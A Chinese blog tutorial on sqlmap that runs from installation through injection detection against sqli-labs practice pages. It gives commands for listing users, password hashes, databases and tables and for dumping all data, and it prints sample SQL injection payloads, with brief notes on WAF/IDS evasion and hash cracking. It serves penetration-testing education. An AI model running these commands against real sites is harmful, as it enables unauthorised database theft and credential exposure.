SQL注入工具之SQLmap入门操作

测试小鬼

于 2024-02-19 15:28:19 发布

阅读量1.1k

点赞数 23

文章标签：自动化 sql python 软件测试经验分享 fiddler 开发语言

本文链接：https://blog.csdn.net/caixiangting/article/details/136171504

版权

了解SQLmap

基础操作

SQLmap是一款自动化的SQL注入工具，可以用于检测和利用SQL注入漏洞。

以下是SQLmap的入门操作步骤：

1.下载SQLmap：可以从官方网站（https://sqlmap.org/）下载最新版本的SQLmap。
2.打开终端：在终端中进入SQLmap所在的目录。
3.输入命令：使用以下命令运行SQLmap：

python sqlmap.py -u <目标URL>

其中，<;目标URL>;是指要测试的网站的URL地址。

1.运行测试：SQLmap会自动检测目标网站是否存在SQL注入漏洞，并给出测试结果。
2.利用漏洞：如果SQLmap检测到目标网站存在SQL注入漏洞，可以使用以下命令利用漏洞：

python sqlmap.py -u <目标URL> --dbs

这个命令将会列出目标网站的所有数据库。

1.获取数据：可以使用以下命令获取数据库中的数据：

python sqlmap.py -u <目标URL> -D <数据库名> -T <表名> --dump

其中，<;数据库名>;和<;表名>;是指要获取数据的数据库和表的名称。

功能

虽然没有官方的图形化界面，但是市面上有很多个人做的图形化插件，如果实在不熟悉命令行可以考虑换成图形化插件进行使用。

SQLMap是一个自动化的SQL注入工具，其主要功能包括：

扫描、发现并利用给定URL的SQL注入漏洞。
内置了很多绕过插件，支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。
数据库指纹识别、数据库枚举、数据提取、访问目标文件系统，并在获取完全的操作权限时实行任意命令。
支持HTTP代理，可以在使用代理时进行注入测试。
支持多线程，可以同时测试多个注入点。
支持自定义HTTP头和Cookie。
支持自定义注入语句。
支持自定义注入深度和注入等级。
支持自定义报告输出格式。
提供waf、ips、ids检查和绕开，采用代理实现隐藏注入
可以导出数据库表和列，自动识别破jie哈希口令
支持脱库

使用SQLmap

软件安装

在kali Linux和Windows环境中都有，kali是自带SQLmap的

基础操作

SQLmap --v //显示版本信息

SQLmap -h //帮助

SQLmap -hh //详细帮助

-level=LEVEL //水平1-5，也不是数字越高越精准，但也不是越高越好。越高数据包发送量就越大，被发现的可能也就越大。如果怕把甲方业务搞挂了，也不要开的太大。

--risk=RISK //风险1-3，也不是数字越高越精准，但也不是越高越好。越高数据包发送量就越大，被发现的可能也就越大。如果怕把甲方业务搞挂了，也不要开的太大。

默认扫完后会把信息存储在more /root/.sqlmap/output/192.168.199.153/log 这个目录下，这是一个隐藏文件夹

GET注入原理

SQLmap是一款自动化SQL注入工具，可以用于检测和利用Web应用程序中的SQL注入漏洞。

它可以通过GET或POST请求向Web应用程序发送恶意请求，以检测是否存在SQL注入漏洞。

以下是SQLmap进行GET注入的原理：

SQLmap会向目标URL发送一个GET请求，同时在URL中注入恶意代码。
目标服务器接收到请求后，将恶意代码传递给后端数据库。如果目标应用程序存在SQL注入漏洞，则数据库会执行恶意代码，并将结果返回给应用程序。
SQLmap会分析返回的结果，以确定是否存在SQL注入漏洞。

以下是一个使用SQLmap进行GET注入的示例命令：

sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch

初级扫描方案

探测是否存在sql注入漏洞

对于不用登录的网站，直接指定其URL

sqlmap -u "http://xxx/Less-1/?id=1"

直接扫到数据库类型为mysql数据库（输入y继续）：

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

我们也可以使用一个参数--batch，这个参数可以省去SQLmap询问，直接选择默认项，例如上面的扫描语句可以写成：

sqlmap -u "http://xxx/Less-1/?id=1" --batch

扫描出id部分存在boolean盲注：

GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

扫描完成后，sqlmap给出了一些验证漏洞的payload信息：

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5728=5728 AND 'IxVn'='IxVn

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x716a6b7171,(SELECT (ELT(8185=8185,1))),0x716b7a6a71),8185) AND 'QMiy'='QMiy

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
    Payload: id=1' OR SLEEP(5)#

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4446' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6b7171,0x697148456f7242714a57456c4c6541624b4a57775163786775634c564b72556b78505a5457584d70,0x716b7a6a71)-- -

扫描结果：

[06:28:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.6

对于需要登录的网站，我们需要指定其cookie

我们可以用账号密码登录，然后用bp抓取其cookie填入

sqlmap -u  "http://xxx/sqli/Less-1/?id=1"   --cookie="抓取的cookie"

对于是post提交数据的URL，我们需要指定其data参数

sqlmap -u "http://xxx/sqli/Less-11/?id=1" --data="uname=admin&passwd=admin&submit=Submit"

更便捷的做法：通过抓取http数据包保存为文件

这样，我们就不用指定其他参数，这对于需要登录的网站或者post提交数据的网站很方便

如下，我们保存网站的访问数据包为data.txt文件：

sqlmap -r data.txt -p id

可以看到，我的网站存在防CSRF公鸡，SQLmap注入失败

查看数据库信息

查看数据库的所有用户：

sqlmap -u "http://xxx/Less-1/?id=1" --users

查看数据库所有用户名的密码

sqlmap -u "http://xxx/Less-1/?id=1" --passwords

查看数据库当前用户

sqlmap -u "http://xxx/Less-1/?id=1" --current-user

扫到当前用户信息：

current user: 'sqlilabs@localhost!'

判断当前用户是否有管理权限：

sqlmap -u "http://xxx/Less-1/?id=1" --is-dba

当前用户是不是root用户：

current user is DBA: False

列出数据库管理员角色：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" --roles

查看所有的数据库：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dbs

查看当前的数据库：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" --current-db

得到当前数据库信息：

(03:25:33] [INFO] fetching currentdatabasecurrent database: 'security'

爆出指定数据库（securty）中的所有的表：


sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --tables

爆出指定数据库指定表中的所有的列：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --columns

爆出指定数据库指定表指定列下的数据：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users -C username --dump

爆出该网站数据库中的所有数据：

sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security -T users --dump-all #爆出数据库security中的users表中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" -D security --dump-all   #爆出数据库security中的所有数据
sqlmap -u "http://xxx/sqli/Less-1/?id=1" --dump-all  #爆出该数据库中的所有数据

举例如下：

基本语法：

SQLmap是一款自动化SQL注入工具，可以用于检测和利用SQL注入漏洞。以下是SQLmap的基本语法：

sqlmap [options]

其中，options包括：

-u：指定目标URL。

--data：指定POST请求的数据。

--cookie：指定cookie。

--level：指定测试的等级（1-5）。

--risk：指定测试的风险等级（0-3）。

--dbs：获取所有数据库。

--current-db：获取当前数据库。

--tables：获取指定数据库中的所有表。

--columns：获取指定表中的所有列。

--dump：获取指定表中的所有数据。

-v：指定详细程度（0-6）。

以下是两个SQLmap的例子：

1.获取所有数据库

sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2

2.获取指定表中的所有列

sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2

测试小鬼

关注

23
点赞
踩
12

收藏

觉得还不错? 一键收藏
0
评论
SQL注入工具之SQLmap入门操作

level=LEVEL //水平1-5，也不是数字越高越精准，但也不是越高越好。越高数据包发送量就越大，被发现的可能也就越大。如果怕把甲方业务搞挂了，也不要开的太大。--risk=RISK //风险1-3，也不是数字越高越精准，但也不是越高越好。越高数据包发送量就越大，被发现的可能也就越大。虽然没有官方的图形化界面，但是市面上有很多个人做的图形化插件，如果实在不熟悉命令行可以考虑换成图形化插件进行使用。：可以从官方网站（https://sqlmap.org/）下载最新版本的SQLmap。
复制链接

扫一扫